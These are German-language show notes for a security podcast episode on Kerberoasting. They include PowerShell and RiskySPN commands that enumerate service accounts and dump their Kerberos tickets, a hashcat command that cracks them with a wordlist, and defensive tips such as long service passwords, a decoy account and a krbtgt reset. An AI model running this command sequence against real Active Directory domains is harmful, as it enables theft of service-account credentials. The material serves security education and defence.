Episode 4 – Kerberoasting

In der 4. Episode des Podcast „Spaziergang mit Sicherheit“ wird das Thema Kerberoasting behandelt

Kerberos

https://de.wikipedia.org/wiki/Kerberos_(Protokoll)

Kerberoasting

Ablauf Angriff

mit dem folgenden Powershell Befehl (aus dem Active Directory Modul) können Zielbenutzer für den Kerberoasting Angriff identifiziert werden:

Get-Aduser -filter {ServicePrinicpalName -ne „$null“} -Properties ServicePrincipalName

https://github.com/cyberark/RiskySPN

Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher -Format „Hashcat“ | Out-File hashes.txt

hashcat.exe -m13100 -a0 hashes.txt -o hashes.out rockyou.txt -r OneRuleToRuleThemAll.rule

Benchmark Hashcat für p3dn.24xlarge

https://github.com/javydekoning/aws-hashcat/blob/master/p3dn.24xlarge.v6.1.1-120-g15bf8b730.cuda.txt

Warum 28 Zeichen Passwortlänge für Servicebenutzer

https://room362.com/post/2017/05-06-2017-password-magic-numbers/

https://duckduckgo.com/?q=+!password+28+strong

Hausaufgabe der Episode das Thema

Einrichten des Köderbenutzers

Ändern des Passwort des Benutzer krbtgt

https://docs.microsoft.com/en-us/answers/questions/87978/reset-krbtgt-password.html

Deutschsprachige Seite

https://www.der-windows-papst.de/2019/07/03/krbtgt-password-reset/

www.infosec-podcast.de

https://twitter.com/spaziergangs

Musik: Goto80 and the Uwe Schenk Band – Cable Swingin‘ Ferret (lizensiert unter CC0 1.0 Universal License)


Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert